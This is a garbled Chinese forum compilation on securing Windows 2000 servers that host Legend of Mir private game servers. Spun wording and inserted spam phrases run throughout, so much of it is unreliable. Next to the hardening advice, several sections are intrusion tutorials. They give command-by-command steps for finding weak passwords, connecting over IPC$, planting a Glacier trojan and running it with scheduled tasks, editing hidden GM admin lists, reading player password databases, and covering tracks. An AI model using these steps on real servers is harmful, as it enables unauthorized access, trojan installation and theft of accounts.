核心提示:Windows2000 含有很多的安闲效用和选项,若是你合理的配置它们,那么windows2000将会是一个很安闲的操作编制.。初级安闲篇1.物理安闲任事器应当安放在安置了监视器的隔离房间内,并且监视器要保存15天以上的摄像纪录。另外,and,桌抽屉要上锁,以确保旁人假使进入房间也无法使用电脑,钥匙...
Windows2000 含有很多的安闲效用和选项,若是你合理的配置它们,那么windows2000将会是一个很安闲的操作编制.。初级安闲篇
1.物理安闲
任事器应当安放在安置了监视器的隔离房间内,并且监视器要保存15天以上的摄像纪录。另外,and,桌抽屉要上锁,以确保旁人假使进入房间也无法使用电脑,钥匙要放在另外的安闲的场地。
2.停掉Guest 帐号
在管理的用户内中把guest帐号停用掉,任何功夫都不允许guest帐号登陆编制。为了安全起见,最好给guest加一个庞杂的密码,你没关系掀开记事本,在内中输出一串蕴涵特殊字符and数字,字母的长字符串,然后把它作为guest帐号的密码拷进去。
3.限制不用要的用户数量
去掉所有的duplichadvertisements user 帐户and 测试用帐户and共享帐号,日常部门帐号等等。用户组战略设置相应权限,并且经常检验编制的帐户,看看我用的是WINDOWS。删除已经不在使用的帐户。这些帐户很多功夫都是黑客们入侵编制的冲破口,编制的帐户越多,黑客们取得合法用户的权限可能性一般也就越大。国际的nt/2000主机,若是编制帐户越过10个,一般都能找出一两个弱口令帐户。我已经发掘一台主机197个帐户中居然有180个帐号都是弱口令帐户。
4.创办2个管理员用帐号
固然这点看下去和下面这点有些抵触,但本相上是恪守下面的规则的。创办一个一般权限帐号用来收信以及办理一些*常事物,另一个具有Administrthroughors权限的帐户只在必要的功夫使用。没关系让管理员使用 “ RunAS” 命令来施行一些必要特权智力作的一些事情,以容易管理。
5.把编制officer帐号改名
大众都知道,单机传奇版本在哪找。windows 2000的officer帐号是不能被停用的,这意味着他人没关系一遍又一边的尝试这个帐户的密码。把Administrthroughor帐户改名没关系有用的防止这一点。当然,请不要使用Admin之类的名字,改了等于没改,尽量把它假装成日常用户,比如改成:guestone。
6.创办一个组织帐号
什么是组织帐号? Look!>创办一个名为”Administrthroughor”的当地帐户,把它的权限设置成最低,什么事也干不了的那种,并且加上一个越过10位的超级庞杂密码。事实上超变态韩版靓装传奇。这样没关系让那些Scripts s忙上一段时间了,并且没关系借此发掘它们的入侵妄想。大概在它的loginscripts下面做点手脚。嘿嘿,够损!
7.把共享文件的权限从”everyone”组改成“受权用户”
“everyone” 在win2000满意味着任何有权进入你的的用户都能够获得这些共享材料。任何功夫都不要把共享文件的用户设置成”everyone”组。包括打印共享,默许的属性就是”everyone”组的,一定不要忘了改。
8.使用安闲密码
一个好的密码对待一个网络是卓殊要紧的,但是它是最容易被粗心的。对比一下网页传奇制作。后面的所说的也许已经没关系说明这一点了。一些公司的管理员创办帐号的功夫往往用公司名,计算机名,大概一些别的一猜就到的东西做用户名,然后又把这些帐户的密码设置得N简单,比如“welcome” “iloveyou”“letmein”大概和用户名相同等等。这样的帐户应当要求用户首此登陆的功夫更改成庞杂的密码,还要注意经常更改密码。前些天在IRC和人商酌这一题目的功夫,我们给好密码下了个定义:安闲期内无法破解进去的密码就是好密码,也就是说,若是人家取得了你的密码文档,必需花43天大概更长的时间智力破解进去,而你的密码战略是42天必需改密码。
9.设置屏幕包庇密码
很简单也很有必要,设置屏幕包庇密码也是防止外部人员伤害任事器的一个屏障。注意不要使用OpenGL和一些庞杂的屏幕包庇程序,华侈编制资源,让他黑屏就没关系了。我用的是WINDOWS。还有一点,所有编制用户所使用的机器也最好加上屏幕包庇密码。
10. 使用NTFS格式分区
把任事器的所有分区都改成NTFS格式。NTFS文件编制要比FATandFAT32的文件编制安闲得多。这点不用多说,想必大众得任事器都已经是NTFS的了。
11.运转防毒
我见过的Win2000/Nt任事器历来没有见到有安置了防毒软件的,其实这一点卓殊要紧。一些好的杀毒软件不光能杀掉一些出名的病毒,还能查杀多量木马和后门程序。听说单机传奇版本在哪找。这样的话,“黑客”们使用的那些驰名的木马就毫无用武之地了。不要忘了经常进级病毒库
12.保证备份盘的安闲
一旦编制材料被伤害,备份盘将是你收复材料的独一途径。备份完材料后,把备份盘防在安闲的场地。千万别把材料备份在同一台任事器上,那样的话,还不如不要备份。
中级安闲篇:
1.应用win2000的安闲配置工具来配置战略
提供了一套的基于MMC(管理掌管台)安闲配置和剖析工具,应用他们你没关系很容易的配置你的以知足你的要求。具体形式请参考微软主页:
windows200...y/sctoolset.or net
2.封闭不用要的任事
windows 2000 的 Termining Services(终端任事),IISand和RAS都可能给你的编制带来安闲缺欠。为了能够在长途容易的管理任事器,很多机器的终端任事都是开着的,若是你的也开了,要确认你已经无误的配置了终端任事。有些歹意的程序也能以任事方式静静的运转。要留意任事器下面封闭的所有任事,2000。中期性(每天)的检验他们。下面是C2级别安置的默许任事:
Computer Browser service TCP/IP NetBIOS Helper
Microsoft DNS server Spooler
NTLM SSP Server
RPC Locthroughor WINS
RPC service Workstine
Netlogon Event log
3.封闭不用要的端口
封闭端口意味着删除效用,在安闲和效用下面必要你作一点决策。若是任事器安置在防火墙的背面,冒的险就会少些,但是,永远不要以为你没关系无忧无虑了。用端口扫描器扫描编制所关闭的端口,确定关闭了哪些任事是黑客入侵你的编制的第一步。相比看传奇单机变态版。\system32\drivers\etc\services文件中有着名端口和任事的对照表可供参考。具体方法为:
网上邻居>属性>当地毗邻>属性>internet协议(tcp/ip)>属性>初级>选项>tcp/ip挑选>属性掀开tcp/ip挑选,增加必要的tcpandudpand协议即可。
4.掀开审核战略
封闭安闲审核是win2000最根本的入侵检测方法。当有人尝试对你的编制举办某些方式(如尝试用户密码and改变帐户战略,未经准许的文件拜候等等)入侵的功夫,都会被安闲审核纪录上去。很多的管理员在编制被入侵了几个月都不知道,直到编制遭到伤害。下面的这些审核是必需封闭的,其他的没关系依据必要增加:
战略 设置
审核编制登陆事情 得胜,铩羽
审核帐户管理 得胜,铩羽
审核登陆事情 得胜,铩羽
审核对象拜候 得胜
审核战略更改 得胜,铩羽
审核特权使用 得胜,铩羽
审核编制事情 得胜,铩羽
5.封闭密码密码战略
战略 设置
密码庞杂性要求 启用
密码长度最小值 6位
逼迫密码历史 5 次
逼迫密码历史 42 天
6.封闭帐户战略
战略 设置
复位帐户锁定计数器 20分钟
帐户锁定时间 20分钟
帐户锁定阈值 3次
7.设定安闲纪录的拜候权限
安闲纪录在默许情景下是没有包庇的,把他设置成惟有Administrthroughor和编制帐户才有权拜候。
8.把迟钝文件寄存在另外的文件中
固然现在任事器的硬盘容量都很大,但是你还是应当琢磨能否有必要把一些要紧的用户数据(文件,数据表,项目文件等)寄存在另外一个安闲的任事器中,并且经常备份它们。
9.不让编制透露上次登陆的用户名
默许情景下,终端任事接入任事器时,登陆对话框中会透露上次登陆的帐户明,当地的登陆对话框也是一样。我不知道传奇sf怎么破解gm权限。这使得他人没关系很容易的取得编制的一些用户名,进而作密码猜想。修正注册表没关系不让对话框里透露上次登陆的用户名,具体是:
HKLM\Software ingmost ingways\Microsoft\WindowsNT\CurrentVersion\Winlogon\DontDisplayLas well astUserNmorninge
把 REG_SZ 的键值改成 1 .
10.压迫建立空毗邻
默许情景下,任何用户通过通过空毗邻连就任事器,进而枚举出帐号,猜想密码。我们没关系通过修正注册表来压迫建立空毗邻:
Locing_Mveryine\System\CurrentControlSet\Control\LSA-RestrictAnonymous的值改成”1”即可。
10.到网站下载最新的补丁程序
很多管理员没有拜候安闲站点的习性,乃至于一些缺欠都出了很久了,还放着任事器的缺欠不补给人家当靶子用。谁也不敢保证数百万行以上代码的2000不出一点安闲缺欠,经常拜候微软和一些安闲站点,下载最新的servicepingternthroughing currentk和缺欠补丁,是保证任事器永世安闲的独一方法。
初级篇:
1. 封闭 DirectDraw
这是C2级安闲程序对视频卡和内存的要求。封闭DirectDraw可能对一些必要用到DirectX的程序有影响(比如游戏,在任事器上玩星际争霸?我晕..$%$^%^&firm;??),但是对待绝大多半的商业站点都应当是没有影响的。修正注册表 HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI的Timeout(REG_DWORD)为 0 即可。
2.封闭默许共享
win2000安置好以还,编制会创办一些藏匿的共享,你没关系在cmd下打 net share ingmost ingways查察他们。网上有很多关于IPC入侵的文章,自信大众一定对它不目生。要压迫这些共享 ,掀开管理工具>管理>共享文件夹>共享在相应的共享文件夹上按右键,点停顿共享即可,不过机珍视新发动后,这些共享又会重新封闭的。
默许共享目录 途径和效用
C$ D$ E$ 每个分区的根目录。想知道SEVER。Win2000 Pro版中,惟有Administrthroughor
和Bingternthroughing currentkup Operthroughors组成员才可毗邻,Win2000 Server版本
Server Operthroughros组也没关系毗邻到这些共享目录
ADMIN$ %SYSTEMROOT% 长途管理用的共享目录。它的途径永远都
指向Win2000的安置途径,比如 c:\winnt
FAX$ 在Win2000 Server中,FAX$在fax客户端发传真的功夫会到。
IPC$ 空毗邻。IPC$共享提供了登录到编制的能力。
NetLogon 这个共享在Windows 2000 任事器的Net Login 任事在处
理登陆域要求恳求时用到
PRINT$ %SYSTEMROOT%\SYSTEM32\SPOOL\DRIVERS 用户长途管理
解决格式:
掀开注册表编辑器。REGED
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lamas well aserver\parmorningeters
在左边建立一个名为AutoShare ingmost ingwaysServer的DWORD键。值为0
3.压迫dump file的爆发
dump文件在编制瓦解和蓝屏的功夫是一份很有用的查找题目的材料(不然我就照字面兴趣翻译成渣滓文件了)。不过,它也能够给黑客提供一些迟钝比如一些应用程序的密码等。要压迫它,掀开掌管面板>编制属性>初级>发动和挫折收复 把写入调试新闻 改成无。要用的功夫,没关系再重新掀开它。
4.使用文件加密编制EFS
Windows2000 健壮的加密编制能够给,文件夹,文件加上一层安闲包庇。这样没关系防止他人把你的硬盘挂到别的机器上以读出内中的数据。记住要给文件夹也使用EFSand而不光仅是单个的文件。相关EFS的具体新闻没关系查察
windows200...ity/encrypt.or net
5.加密temp文件夹
一些应用程序在安置和进级的功夫,皱恒神峰中变传奇。会把一些东西拷贝到temp文件夹,但是当程序进级收场或封闭的功夫,它们并不会自己消除temp文件夹的形式。所以,给temp文件夹加密没关系给你的文件多一层包庇。
6.锁住注册表
在windows2000中,惟有maour agers和Bingternthroughing currentkupOperthroughors才有从网络上拜候注册表的权限。其实最新开中变靓装传奇。若是你觉得还不够的话,我不知道中变传奇网站。没关系进一步设定注册表拜候权限,仔细请参考:
suppor...s/Q153/1/83.or net
7.关机时消除掉页面文件
页面文件也就是调理文件,是win2000用来没有装入内存的程序和数据文件局部的藏匿文件。一些第三方的程序没关系把一些没有的加密的密码存在内存中,页面文件中也可能含有另外一些迟钝的材料。要在关机的功夫认识打听页面文件,没关系编辑注册表
HKLM\SYSTEM\CurrentControlSet\Control\Session Maour ager\MemoryMaour agement
把ClearPour ageFileAtShutdown的值设置成1。
8.压迫从和CD Rom发动编制
一些第三方的工具能通过指导编制来绕过原有的安闲机制。若是你的任事器对安闲要求卓殊高,没关系琢磨使用可挪动转移软盘和光驱。把锁起来扔不失为一个好方法。听说刚开一秒中变靓装传奇。
9.琢磨使用智能卡来取代密码
对待密码,总是使安闲管理员势成骑虎,容易遭到 10phtcringternthroughing currentk等工具的攻击,若是密码太庞杂,用户把为了记住密码,会把密码各处乱写。若是条件允许,用智能卡来取代庞杂的密码是一个很好的解决方法。
10.琢磨使用IPSec
正如其名字的含义,IPSec 提供 IP 数据包的安闲性。IPSec提供身份考证、完备性和可采用的奥密性。发送方在传输之前加密数据,而授与方计算机在收到数据之后解密数据。应用IPSec没关系使得编制的安闲本能机能大大增强。
SF的必需关闭端口,极端解决端口安闲的方法
传奇关闭端口+花生壳+一些必需端口
没关系将这些端口使用TCP/IP挑选,只关闭这些端口增加安闲性and(开设其他任事,端口自己再插足)
TCP/IP挑选端口-> TCP断口
端口7220 .... RunGhadvertisements 1 端口
端口7210 .... RunGhadvertisements 2 端口 同时封闭3个RunGhadvertisements
端口7200 .... RunGhadvertisements 3 端口
端口7100
端口7012
端口6000
端口5600
端口5500
端口5100
端口5000
端口4900
端口3389
端口3372
端口3100
端口3000
端口1027
端口1025
端口0135
\system32\drivers\etc\services 文件中有着名端口和任事的对照表可供参考。具体方法为:
网上邻居>属性>当地毗邻>属性>internet协议(tcp/ip)>属性>初级>选项>tcp/ip挑选>属性掀开tcp/ip挑选,增加必要的tcpand协议即可。
我开了3个RunGhadvertisements端口,解决多个玩家同时登陆拜候时会出现7200毛病而使任事器猝然狂卡,开3个结果比力好。是*(ggggg7原创)
开3个RunGhadvertisements端口的方法:
RunGhadvertisements文件夹再复制2份 分辨为RunGhadvertisements1andRunGhadvertisements2andRunGhadvertisements3将内中的Mirghadvertisements.ini分辨改为GhadvertisementsPort=7200andGhadvertisementsPort=7210andGhadvertisementsPort=7220
DBSrv200文件夹下的!serverinfo.txt改为127.0.0.1 127.0.0.1 7200 127.0.0. 127.0.0.1 7220
Mir200文件夹下的!servertinside a.txt改为
1 127.0.0.1 7200
2 127.0.0.1 7210
3 127.0.0.1 7220
然后运转RunGhadvertisements1andRunGhadvertisements2andRunGhadvertisements3 下的3个RunGhadvertisements.exe
M2Server会提示:
Ghadvertisements 0 opened
Ghadvertisements 1 opened
Ghadvertisements 2 opened
适宜的加点防火墙会更好
私服的攻与防
自己崇尚私服技术!亲热研究私服!为营建一个好的游戏空气而联合勤恳过!
前几*,本私服也异样遭遇过黑客的攻击!但是研究了几次发掘了缺欠的所在!
下面我先写如何入侵的,我用的是WINDOWS 2000 SEVER
1 X-SCAN扫描IP看看谁是弱口令(IP也卓殊容易取得,私服都有,弱口令就是用户名和密码都是编制默许的,没有改。)
2 掀开DOS编制 在DOS下举办*作!
c:/>net use \\192.168.0.1\ipc$ /user:officer进入对方计算机USER进入的就是管理员用户。
进入了以还就好办了,没关系找你要黑的私服!做GM也好,搞伤害删除也好,比如做GM吧!
c:/>copy\\192.168.0.1\d$\mirserver\mir200\envir\maour agementlist.txt都是命令,没关系看进去,新开中变靓装传奇。另外的想奈何改就凭你了,但是我得评释一下!!这段代码主意很简单就是将D盘拷贝一个传奇GM的列表,你没关系把你自己增加进去在编辑!
c:\>edit\\192.168.0.1\d$\mirserver\mir200\envir\maour agementlist.txt
这样就没关系了。这是应用弱口令进入计算机的方法!!当然了还有更多的方法。
我在讲讲我的 ** 传奇的遭黑的体验!
首先,就是乱动,很昭着就是被人掌管了,剖析如下:1,中木马,2长途掌管!
其次,有文件掩盖的对话框,计算机被猝然重新发动!!剖析如下:1,伤害编制,2,对传奇的掌管!3,再行发动是为了黑客的设置收效!
再次,有违警GM制造物品,以被查出。剖析如下:是针对传奇而来!
解决格式:用杀毒杀毒,最好在DOS下举办!2,是2000的缺欠太多,查找无用的端口,并封闭3389等,下载 2000SP3 的补丁!在掌管面板入选当地用户和组中封闭GUEST帐号!和 IUSR(计算机名)INTNERNET来宾帐号封闭(我的传奇就是黑客应用这个号进入计算机的),修正超级管理员用户名与密码!在封闭长途拜候等效用,另外,攻击传奇主要是GM列表,我异样也中过,sever。气象是这样的,掀开AdminList.txt文件,没有发掘多的GM,应用CTRL-A看看有没有多余的GM,另外仔细一看,在看AdminList.TXT的文件名背面有没有空格,设置文件齐备透露,会发掘能否多了一个藏匿GM列表文件,这也是屡进不止的发掘有违警GM的缘故原由.黑客攻击我的计算机是用了2个小时就被我发掘了,随即做了相应的修正,收复了传奇的一般运转,哪里有传奇sf服务端。至今为止,如故有人进入我的来宾帐号的警觉,但是已经进不来了!传奇也步入了一般的运转当中!
固然我写了一些如何攻击和防御计算机的方法和解决格式,我自己也觉得有点自我抵触的想法,但是我的主意很是简单,希望能够佐理你解决你的题目!进步自己计算机的安闲
如何在他人的私服做GM????
攻击初级教学
我在侵入他人4f所使用的方法
看到有些4f做的不错,但是进去又不是很有钱,也没设备,高手也很多,一直不嗜好在内中当菜鸟的我,一语气进入他们的端大闹一番之后。当足了gm的瘾,现在我把方法发表与大众。。。。
其实我所使用的方法很简单,惟有4个工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其实就是2000下的dos啦)!
(四)冰河8.4 操作编制:win2000 server 大概winxp编制。听说SEVER。“shed.exe”:其实就是用来网上查共享资源的,速度快,没关系查到很多任事断的共项文件,不过在这内中有些ip在阅读器中无法拜候,这是由于其中也蕴涵了私人上网的ip.呵呵!一些作网站,网吧的任事器一些目录都是共享的,有些是没关系拜候,但是不能删除,由于你所拜候的都是以匿名拜候的,所以权限不够!有些必要密码。遇到密码怎办?用流光!“流光”虽说对202作了限制,但是对小日本的ip可是没无限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒散,把officer设置的过于简单,呵呵,你就没关系抓到了。
下一步如何做呢?也许在你查对方的端口时发掘对方开的端口很少,比如ftp没开,相比看windows。怎办呢?冰河!“冰河”,想必许多伴侣都玩过,使用冰河掌管一台任事器速度很快,(由于任事器那边带宽很大)几分钟就没关系查到对方主机的主页所在位置。但是如何上传并且掌管他呢?“cmd.exe” 是2000下的dos了,施行cmd.exe 使用net命令,
具体操作如下:
第一步:net use \\ip\ipc$“prear endword” /user:”user”说明:以一个超级用户名与你想黑的网站建立连接,当然超级用户必需是该网站maour agement里的。这里的”ip”就是主机了,“prear endword”就是超级用户的密码,“user”就是超级用户。比如:netuse \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie
第二步:copy g-server.exe \\ip\maour agement$\system32说明:g-server.exe就是冰河的长途任事器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边没关系发觉进去的吧,呵呵!装了防火墙揣摸没关系,不过很多主机没钱买呀!不像中国盗版满天飞!若是你有最新的木马也没关系的!这是最好的了!!嘿嘿……
第三步:net time \\ip 察看对方的任事器时间。由于有时差,应当是一个小时吧!所以必必要以对方的任事器时间为准。
第四步:through \\ip time g-server.exe这里的time就是对方的主机时间。作用:在礼貌时间施行该程序。比如through \\210.248.250.2 19:55g-server.exe 第五步:冰河就没关系掌管该了。这个我就不说了吧,你看中变传奇网站。呵呵!菜鸟也会玩的软件。
这时我们就没关系掌管任事器了,
net use * \\ip\*$ 长途映照
看这个
mir.db内中有每私人的数据,并且没加密的,大众没关系用
see找开来改一下,改几个极品,如0-80攻的木剑啊,0-50魔的六角戒指之类的,那就随你的便了。只是这样也太烦人了。呵呵。
比如武器and数据格式如下(齐备是16进制)
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 000a
后面**的是物品代码,然后0xce 00 是武器代码(高位在后),和物品db数据库中对应,
例:物品数据库中屠龙是序号(idx)是205and对应到这里就是(205+1)转为16进制是ce
背面的 43 12是目下长期度,88 13是最大长期度。
例:43 12换算成十进制为,长期度为17
背面的01 02 03挨次是攻击、魔法、道术。
注意是在原武基础上增加。
例:下面的屠龙透露进去是攻击:5-36,道术:0-2,魔法:0-3。
背面的04 05 06 07 08 09挨次是武器的 幸运、叱骂、准确、攻击速度、强度。超变态韩版靓装传奇。
背面两个空位后紧跟的0x0a是表示武器能否被修炼,具体来说
给武器加攻击时:
修炼前:00
修炼后:0a
尝试得胜后:00,攻击值增加。
对待首饰和衣服and自己研究吧,这有好多人都知道的吧and我没细写。网上这方面的文章是有的,我就不用多说了吧?
然后到,mirserver\mud2\logsrv\iddb下
这里有个id.db所有人的帐号和密码都在了,你看着办吧,不过偷人家的号也不是什么荣耀的事,我是历来不做的,只是一再会拿gm的号来reloadvertisements一下。呵呵
这里,我把你边走边看加到这个任事器的maour agementlist,呵呵,这里是打个歧,这里插足你的名字)and然后,我们到mir.db中找出gm的帐号,再到id.db中找出这个帐号的密码。好了,ok了,用gm号进入游戏(进之前m一下他啊,网页传奇制作。不要让人家发掘了,也不要改人家的密码,让人家发掘了多不好啊,呵呵)。打命令@reloadvertisementsmaour agement。立刻out吧。
然后,把你插足maour agementlist的人物从maour agementlist里删除,好了,你进去游戏吧,你是gm了,可是真正的gm是不会从任事器端看到你的名字呢!!他也许在想“这里奈何了啊?仿佛还有个gm???”。呵呵,不过不要过火了,不然人家一个reloadvertisements你的权限就没了啊。
到这里大众做gm的梦就完成了,下面我说的就是奈何长途掌管任事器主机了,比如给他关机啊重启啊····
私服技术我是一点都不懂。不过安闲方面还是略懂一二哦!
任事器入侵主要靠的是帐号与密码。大众要先明白什么是编制帐号。什么是编制密码!
其它WINDOWS每一个编制都有着他的超级管理员帐号与密码!
一但这些被黑客扫描到的话,哪么你将会取得一个恐怕的威迫!
当你私服是人气高的功夫。给黑客入侵的话,哪要是万一给删了数据。到功夫。真的是惨不忍堵。
一:了解一下帐号的含义
先运转CMD
然后输出:net user(回车健)
这样后,会透露一例帐号
再查察管理员帐号
输出:net locinggroup maour agers
这就是查察maour agers组的用户。这样的话若是人家用藏匿帐号的方法也会查进去!
编制自带的超级管理员帐号是officer
记住这里透露进去多个帐号不明的帐号。哪就证明你机器不安闲了。若出现在的帐号都是你自已的帐号。哪百分之四十你机器未被入侵
帐号安闲:
二:密码篇
你若觉得自已的帐号密码是哪么不出三秒人家就到你机上一游了。其实哪里有传奇sf服务端。
修正密码方法,在DOS下修正更安闲
输出net user 帐号名 需修正密码(然后回车健)
一般密码设庞杂一点!
溢出:
2000任事器版装下去会主动装IIS的,若你觉得IIS没有什么用就停顿。IIS地址:早先》》程序》》管理工具》》Internet任事(这个就是IIS)你将他封闭。下面按停顿!这样就进一步安闲了。不过若IIS你必要用的话,哪么记得打目前最新的补丁SP4哦。
RPC溢出。大众记住,试试telnet IP135看看有没有开着。若是开着。请打RPC补丁。若找不到。舒服装个防火墙,将135端屏蔽!
大众千万要记住。入侵编制最关点的就是要帐号密码。包庇好自已帐号与密码。安闲一定属于你!
本文惹起遍及4f具有者的注意
入侵传奇私服/充任违警GM。
首先,我得声明and我写本文并不是教大众如何去黑4f,只是想以本文惹起遍及4f具有者的注意
,进步自己的网管程度。
我爱玩游戏,但却玩得很菜,也没有时间去玩,只想玩着过瘾,所以,我不知道最新开中变靓装传奇。当我早先玩传奇时,
虽觉得是好玩,但玩盛大的的确是在受罚,进级慢,没好设备,处处受人侮辱。所以,4f是明
智的采用,但进去时也没有好设备,也是受人侮辱,难道我不没关系做gm?试试,folling me!
找来一大堆4f的ip,开个x-sca扫吧。有了,还真不少,都是弱口令的,这些网管真菜呀。
选好一个,192.168.0.1andgo!
掀开cmd,
1)c:/>net use 192.168.0.1ipc$/user:officer
毗邻得胜,
ok,连上了,得胜在望,我不知道怎么架设单机传奇。
2)c:/>copy192.168.0.1d$mirservermir200envirmaour agementlist.txt
编制找不到指定的文件。
没有?不可能吧?唔,一定是藏匿了,没关联,再来,
3)c:>throughtrib -r -h192.168.0.1d$mirservermir200envirmaour agementlist.txt
没有提示,得胜了,
这次连复制也不用了,间接改吧,
4)c:>edit192.168.0.1d$mirservermir200envirmaour agementlist.txt
会掀开个介面,看看内中有哪些gm,加个吧,自己记得就行了,改完生存加入
5)c:>throughtrib +r +h192.168.0.1d$mirservermir200envirmaour agementlist.txt
把maour agementilist.txt复原成只读藏匿,2000。
好了,半途而废,快扫除足迹吧,别让人发掘被入侵了,
现在,就等着编制重启了,等不及的话就在第五步让它重启,不过这样太紧张了,还是等吧
,
第二天注册个帐号,新建个之前加的人名进去,
/who
目下150人在线
哈,我就是gm了。急速把自己进级,
@level -1
进级得胜,255级,哈哈
再造出想要的设备,想要什么尽兴造吧,
反复下面的把自己从maour agementlist.txt里删了,哈哈,你知道最新开中变靓装传奇。好设备到手了,没关系玩了
面记得有位伴侣对增强对安闲性的解决方法举办了一系列的说明and讲得卓殊仔细and但是我觉得还有很多必要补充的场地.的编制是缺欠和补丁著称and真正要对任事器的安闲配置确凿卓殊穷困and琢磨的方面也太多了.
本日先讲一个方面的形式了and也算是对后面的伴侣的进一步补充吧!
后面那位伴侣所概述的主要是针对WIN2000编制弱口令的安闲设置!他已经说得很仔细了and做到那些and口令这一关差不多了.确凿在的期间and口令真的卓殊要紧.我对国外的主机举办了一系列的测试and就拿有弱口令的编制来说and还有不少!其中也包括了不少中小型企业的WEB任事器andE-MAILandPROXY任事器都有这种低级的毛病!
若是说你在这方面做得卓殊的仔细.但你至多还要仔细研究一下你主机现在所运转的有哪些任事and这些任事代表着什么?你应当很认识打听!由于现在黑客and木马工具and长途掌管软件大多是以一种任事的形式运转在你的任事器编制里and一般的防火墙and杀毒软件对其并没有任何反映的.对待任事形式出现的掌管工具.比力难过发掘and所以你就必需在任事器里运转的哪些任事卓殊谙习.对待目生或瑰异的任事应当安闲设置好.
下面我都WIN2000的WWW(IIS)任事器安闲配置略讲一下andWWW任事在WIN2000SERVERandADSERVERandDATACENTERSERVERand版本中是默许安置的and若是你不必要用2000的WWW任事的话and提倡不要安置.至于增加/删除你没关系掌管面板的去掉他的安置and大概在管理工具/任事里设置WORDWIDE WEB SERVICE发动类型为手动/禁用
这样的话编制就不默许发动改任事!
若是你必要用IIS来建站传播一下自己的私服and你就必需按以下方法安闲配置好IISand
在IIS组件你首先要去掉你不必要的SMTPandSNNPandFTPand这样的话你没关系低沉你任事器运转所占用的CPU资源and和内存使用率.然后提倡你删除你C:\INTERPUB\目录下的所无形式!大概更改途径.在IIS管理器中删除默许站点and(大概删除SCRIPTS这个虚拟目录)由于这个目录有可写的权限的.在新建的WEB站点中and设置IIS的权置and必需让它不能写入and或运转.由于IIS是默许支持ASP脚本的.然后在IIS中删除不必要的映照and这个很要紧.若是你要支持PHPandCGI脚本的话and你还得配置好PHP.CGI的应用程序的无误映照and禁用或删除FSO组件and(去年深圳之窗就是被人家应用FSO黑了......)若是你要使用FSO的话and最好要改名!否则的话and你给他人提供主页上传的话and你一定是会被黑的.谨慎呀!
目前在黑客横行的互联网空间中and应用IIS的缺欠and提申自己的权限and而成为ADand这些只是瓮中捉鳖的事情and这不必要花几天的时间去暴力破解一下口令and像自己架设的WEB任事器有种情景and更是数不甚数了.关于怎应用UNICODE缺欠去提供AD权限的文章and网上太多了and我就不多讲了.
这些来说应当是任事器安闲防守方面的一个例子而已and真正要做到任事器的安闲运转and必要你花多量的时间去寻求.由于这些来说and足以苟且一些无聊的.....当然了and你若是必要WEB任事器and我还是提倡你去使用AP了.他的源代码建设and收费and安闲性固定性都比IIS强得多了.
相比看黑暗传说单机最新版4.0
